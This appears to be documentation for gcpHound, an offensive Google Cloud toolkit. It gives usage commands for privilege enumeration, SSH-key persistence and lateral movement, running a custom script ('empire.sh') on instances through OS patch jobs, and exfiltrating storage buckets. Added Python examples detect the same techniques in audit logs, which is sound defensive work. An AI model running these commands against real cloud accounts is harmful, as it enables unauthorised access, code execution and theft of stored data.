gcpHound : A Swiss Army Knife Offensive Toolkit for Google Cloud Platform (GCP)

  • Enumerate path for Privilege Escalation
  • Multiple Persistence methods
  • Lateral Movement
  • Discovery and Collection for Google Cloud Storage (GCS) buckets
  • Exfiltrate GCS Buckets

GCP 101

A hypothetical domain using GCP is shown in the image below.

GCP Hierarchy

Setup

Update 22nd August 2022: Check out the latest version of gcpHound and its added features in this article.

$ docker pull desijarvis/gcphound:v1.1-beta
$ docker run --name gcpHound -it desijarvis/gcphound:v1.1-beta /bin/bash
root@<containerID># cd /root/gcpHound/
root@<containerID># gcloud auth login --no-launch-browser
root@<containerID># gcloud config set project <project-id>
gcpHound docker container

Highway to Privilege Escalation

orgGCPHound

Enumerates the IAM permissions of the organizations.

USAGE :
$ ./gcpHound --orgGCPHound org1.redteam.com org2.redteam.com   (Make sure to use the organization ID and not the name of the organization)
OR
$ ./gcpHound --orgGCPHound   (To enumerate all organizations)

projectGCPHound

BUG UPDATE 16th October, 2021: If gcpHound gets stuck while querying groups (or during the groupGCPHound function), you can take the following action to resolve it.

root@<containerID># gcloud beta identity groups search --labels=cloudidentity.googleapis.com/groups.discussion_forum --organization=org1.redteam.com
root@<containerID># gcloud identity groups memberships list --group-email=redteam-group1@redteam.com

USAGE :
$ ./gcpHound --projectGCPHound redteam-project1 redteam-project2   (Make sure to use project IDs and not project names)
OR
$ ./gcpHound --projectGCPHound   (To enumerate all projects)

groupGCPHound

Enumerates all groups of all the organizations and fetches the members of those groups.

USAGE :
$ ./gcpHound --groupGCPHound redteam-group1@redteam.com redteam-group2@redteam.com
OR
$ ./gcpHound --groupGCPHound   (To enumerate all groups)

runGCPHound

This function combines all three functions above. If you are not worried about making some noise, use this one.

USAGE :
$ ./gcpHound --runGCPHound

enumPrivileges

This function analyzes the data collected by the previous functions to find the privileges of a user.

USAGE :
$ ./gcpHound --enumPrivileges   (This enumerates the privileges the compromised user has)
OR
$ ./gcpHound --enumPrivileges gcpadmin@redteam.com user@redteam.com redteam-group3@redteam.com   (This enumerates the privileges of the desired users and/or groups)
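The privilege analysis described above is the same question a defender asks when reviewing a project: which concrete principals end up holding which roles once group membership is expanded. The following is an added example written for this page, not gcpHound's own code. It takes an IAM policy in the shape returned by `gcloud projects get-iam-policy --format=json` together with a group-to-members mapping (both constructed here; the set of "review first" roles is this example's choice, not a GCP list) and resolves effective roles per principal, following nested groups and guarding against membership cycles.

```python
"""Resolve effective project roles through group membership (added example).

Input: an IAM policy in the `gcloud projects get-iam-policy --format=json`
shape and a constructed mapping of group email -> members. Output: the
roles each concrete principal holds, directly or via (nested) groups.
"""
import json
from collections import defaultdict

# Constructed sample policy; the binding/member syntax mirrors real GCP IAM
# policies (user:, group:, serviceAccount: prefixes). Not real data.
SAMPLE_POLICY = json.dumps({
    "bindings": [
        {"role": "roles/owner", "members": ["user:gcpadmin@redteam.com"]},
        {"role": "roles/compute.instanceAdmin.v1",
         "members": ["group:redteam-group3@redteam.com"]},
        {"role": "roles/storage.objectViewer",
         "members": ["group:redteam-group1@redteam.com",
                     "serviceAccount:ci@redteam-project1.iam.gserviceaccount.com"]},
        {"role": "roles/viewer", "members": ["user:user@redteam.com"]},
    ],
    "etag": "BwXconstructed",
    "version": 1,
})

# Constructed group memberships; group1 nests group3 to show expansion.
SAMPLE_GROUPS = {
    "redteam-group1@redteam.com": ["user:user@redteam.com",
                                   "group:redteam-group3@redteam.com"],
    "redteam-group3@redteam.com": ["user:dev@redteam.com"],
}

# Roles a reviewer would look at first. This is the example's choice.
HIGH_IMPACT_ROLES = {
    "roles/owner",
    "roles/editor",
    "roles/compute.instanceAdmin.v1",
}


def expand_members(members, groups, seen=None):
    """Return the set of non-group principals behind a member list,
    following nested groups; `seen` stops membership cycles."""
    seen = set() if seen is None else seen
    out = set()
    for member in members:
        if member.startswith("group:"):
            name = member[len("group:"):]
            if name in seen:
                continue
            seen.add(name)
            out |= expand_members(groups.get(name, []), groups, seen)
        else:
            out.add(member)
    return out


def effective_roles(policy_json, groups):
    """Map each concrete principal to the sorted list of roles it holds."""
    policy = json.loads(policy_json)
    roles = defaultdict(set)
    for binding in policy.get("bindings", []):
        for principal in expand_members(binding["members"], groups):
            roles[principal].add(binding["role"])
    return {p: sorted(r) for p, r in roles.items()}


def high_impact_principals(policy_json, groups):
    """Principals holding at least one role from HIGH_IMPACT_ROLES."""
    return {p: sorted(set(r) & HIGH_IMPACT_ROLES)
            for p, r in effective_roles(policy_json, groups).items()
            if set(r) & HIGH_IMPACT_ROLES}


if __name__ == "__main__":
    for principal, roles in sorted(effective_roles(SAMPLE_POLICY, SAMPLE_GROUPS).items()):
        print(principal, roles)
    print("review first:", high_impact_principals(SAMPLE_POLICY, SAMPLE_GROUPS))
```

Run against a real policy, the interesting rows are the ones where a principal gains a high-impact role only through a group, since that is the path a project-level `get-iam-policy` alone does not make visible.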

Persistence

addNewComputeInstance

This function creates a new compute instance with a public IP and adds the provided SSH public key to the instance.

USAGE :
$ ./gcpHound addNewComputeInstance --instance redteam-instance-1 --zone us-central1-a --sshKeyFilePath ~/.ssh/id_rsa.pub

addsshkeyComputeInstance

Adds an SSH key to an existing compute instance.

USAGE :
$ ./gcpHound addsshkeyComputeInstance --instance redteam-instance-2 --zone us-central1-a --sshKeyFilePath ~/.ssh/id_rsa.pub

Lateral Movement

addsshkeyProjectMetadata

This function adds the SSH key to the project metadata, which means you can SSH to all compute instances in the project (except for the ones that block project-wide metadata SSH keys).

USAGE :
$ ./gcpHound addsshkeyProjectMetadata --projectId redteam-project1 --sshKeyFilePath ~/.ssh/id_rsa.pub
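Each of the three SSH-key techniques above (new instance, instance metadata, project metadata) is an admin operation that lands in the Compute Engine Admin Activity audit log, so this is where a blue team catches them. The following is an added detection example written for this page, not gcpHound's own code. The log records are constructed; `protoPayload.methodName`, `authenticationInfo.principalEmail` and `resourceName` are real audit-log fields, while the assumption that the logged `request` carries `metadata.items` (and `networkInterfaces` for instance creation) is this example's. Method names are matched by suffix because real entries carry an API-version prefix such as `v1.` or `beta.`.

```python
"""Flag SSH-key persistence and lateral movement in Compute audit logs (added example).

Scans Admin Activity log records (JSON Lines) for the methods behind
addNewComputeInstance, addsshkeyComputeInstance and addsshkeyProjectMetadata
and reports who pushed key material where, whether the instance blocks
project-wide keys, and whether a new instance got a public IP.
"""
import json

# Method suffix -> how a reviewer would classify it.
WATCHED = {
    "compute.projects.setCommonInstanceMetadata": "project-wide SSH key (lateral movement)",
    "compute.instances.setMetadata": "instance SSH key (persistence)",
    "compute.instances.insert": "new instance created with SSH key (persistence)",
}


def _record(method, principal, resource, request=None):
    """Build one constructed audit-log record (not real log output)."""
    payload = {"methodName": method,
               "authenticationInfo": {"principalEmail": principal},
               "resourceName": resource}
    if request is not None:
        payload["request"] = request
    return json.dumps({"protoPayload": payload})


_KEY = "ops:ssh-ed25519 AAAAC3constructed ops@redteam"  # constructed, not a real key
_ZONE = "projects/redteam-project1/zones/us-central1-a"

SAMPLE_LOGS = "\n".join([
    _record("v1.compute.projects.setCommonInstanceMetadata", "user@redteam.com",
            "projects/redteam-project1",
            {"metadata": {"items": [{"key": "ssh-keys", "value": _KEY}]}}),
    _record("v1.compute.instances.setMetadata", "user@redteam.com",
            f"{_ZONE}/instances/redteam-instance-2",
            {"metadata": {"items": [{"key": "block-project-ssh-keys", "value": "TRUE"},
                                    {"key": "ssh-keys", "value": _KEY}]}}),
    _record("beta.compute.instances.insert", "user@redteam.com",
            f"{_ZONE}/instances/redteam-instance-1",
            {"metadata": {"items": [{"key": "ssh-keys", "value": _KEY}]},
             "networkInterfaces": [{"accessConfigs": [{"natIP": "203.0.113.7"}]}]}),
    # Benign noise: an instance start with no metadata change.
    _record("v1.compute.instances.start", "dev@redteam.com",
            f"{_ZONE}/instances/redteam-instance-9"),
])


def ssh_key_findings(jsonl):
    """Return one finding per watched record that actually carries ssh-keys."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        payload = json.loads(line).get("protoPayload", {})
        method = payload.get("methodName", "")
        category = next((c for m, c in WATCHED.items() if method.endswith(m)), None)
        if category is None:
            continue
        request = payload.get("request", {})
        items = request.get("metadata", {}).get("items", [])
        keys = [i.get("value", "") for i in items if i.get("key") == "ssh-keys"]
        if not keys:
            continue  # metadata change that did not touch ssh-keys
        blocks_project_keys = any(
            i.get("key") == "block-project-ssh-keys" and str(i.get("value", "")).upper() == "TRUE"
            for i in items)
        public_ip = any(cfg.get("natIP")
                        for nic in request.get("networkInterfaces", [])
                        for cfg in nic.get("accessConfigs", []))
        findings.append({
            "category": category,
            "principal": payload.get("authenticationInfo", {}).get("principalEmail"),
            "resource": payload.get("resourceName"),
            "ssh_keys": keys,
            "blocks_project_ssh_keys": blocks_project_keys,
            "public_ip": public_ip,
        })
    return findings


if __name__ == "__main__":
    for f in ssh_key_findings(SAMPLE_LOGS):
        print(f["category"], "|", f["principal"], "|", f["resource"])
```

The project-wide finding is the one worth paging on: it grants access to every instance that does not set `block-project-ssh-keys`, which is also the instance-level mitigation for this technique.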

executeOSPatch

This function pushes an OS patch job to the desired compute instance using a custom-provided script.

USAGE :
$ ./gcpHound executeOSPatch --instance redteam-instance-3 --zone us-central1-a --scriptFilePath empire.sh --jobname patch-tuesday

Discovery and Collection

The bucketLister function discovers and collects the paths of GCS buckets.

USAGE :
$ ./gcpHound --bucketLister redteam-project1 redteam-project2
OR
$ ./gcpHound --bucketLister   (To enumerate buckets for all projects)

Exfiltration

The exfilGCSBuckets function downloads the GCS buckets of specific projects OR of all projects.

USAGE :
$ ./gcpHound --exfilGCSBuckets redteam-project1 redteam-project2
OR
$ ./gcpHound --exfilGCSBuckets   (To exfiltrate buckets for all projects)
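A whole-bucket download like the one above looks very different from normal application traffic: a single principal issues `storage.objects.get` against many distinct objects in a short window. The following is an added detection example for this page, not gcpHound's own code. It needs the Cloud Storage Data Access (DATA_READ) audit log, which is off by default and must be enabled per project; the records below are constructed, the `methodName`/`principalEmail`/`resourceName` fields are real, and the five-minute window and 25-object threshold are this example's choices.

```python
"""Spot bulk GCS object reads in Data Access audit logs (added example).

Groups storage.objects.get records by (principal, bucket), slides a time
window over them and alerts when the number of distinct objects read inside
one window reaches a threshold. A bucket-wide download trips this; a service
that reads a few config objects an hour does not.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone


def _record(ts, principal, bucket, obj="", method="storage.objects.get"):
    """One constructed Data Access log record (not real log output)."""
    resource = f"projects/_/buckets/{bucket}"
    if obj:
        resource += f"/objects/{obj}"
    return json.dumps({
        "timestamp": ts.isoformat().replace("+00:00", "Z"),
        "protoPayload": {"methodName": method,
                         "authenticationInfo": {"principalEmail": principal},
                         "resourceName": resource}})


_T0 = datetime(2021, 10, 16, 12, 0, tzinfo=timezone.utc)
_BUCKET = "redteam-project1-backups"

# Constructed sample: one user pulls 40 objects in two minutes, a service
# account reads 3 objects over an hour, plus one listing call.
SAMPLE_LOGS = "\n".join(
    [_record(_T0 + timedelta(seconds=3 * i), "user@redteam.com", _BUCKET,
             f"dump-{i:03}.sql.gz") for i in range(40)]
    + [_record(_T0 + timedelta(minutes=20 * i),
               "app@redteam-project1.iam.gserviceaccount.com", _BUCKET,
               f"config-{i}.json") for i in range(3)]
    + [_record(_T0, "user@redteam.com", _BUCKET, method="storage.objects.list")]
)


def parse_ts(value):
    """Parse the RFC 3339 UTC timestamp used in these records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def bulk_readers(jsonl, window=timedelta(minutes=5), threshold=25):
    """Return alerts for (principal, bucket) pairs that read >= threshold
    distinct objects within any window of the given length."""
    reads = defaultdict(list)
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        payload = rec["protoPayload"]
        if payload.get("methodName") != "storage.objects.get":
            continue
        parts = payload["resourceName"].split("/")
        # Expected shape: projects/_/buckets/<bucket>/objects/<object path>
        if len(parts) < 6 or parts[2] != "buckets" or parts[4] != "objects":
            continue
        bucket, obj = parts[3], "/".join(parts[5:])
        principal = payload["authenticationInfo"]["principalEmail"]
        reads[(principal, bucket)].append((parse_ts(rec["timestamp"]), obj))

    alerts = []
    for (principal, bucket), events in reads.items():
        events.sort()
        in_window = Counter()  # object -> reads currently inside the window
        peak = lo = 0
        for ts, obj in events:
            in_window[obj] += 1
            # Slide the left edge forward until the window fits.
            while ts - events[lo][0] > window:
                old = events[lo][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                lo += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts.append({"principal": principal, "bucket": bucket,
                           "distinct_objects_in_window": peak})
    return alerts


if __name__ == "__main__":
    for alert in bulk_readers(SAMPLE_LOGS):
        print(alert)
```

Tune the threshold per bucket: backup and export buckets are legitimately read in bulk by known service accounts, so an allowlist of those principals keeps the rule quiet without blinding it to a human identity doing the same thing.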

Caveats

Execution of these functions depends on what privileges you have. The enumPrivileges function should help you pinpoint your attacks to the appropriate projects and organizations.

In The End

The ways Google Cloud permissions and features can be attacked are by no means limited to these functions.

CREDITS

This tool has been developed alongside Brad Richardson.

Madhav Bhatt

Effective collaboration between red and blue can produce offensive defense, a.k.a. the blue team quickly detecting, responding to and disrupting attackers' activities.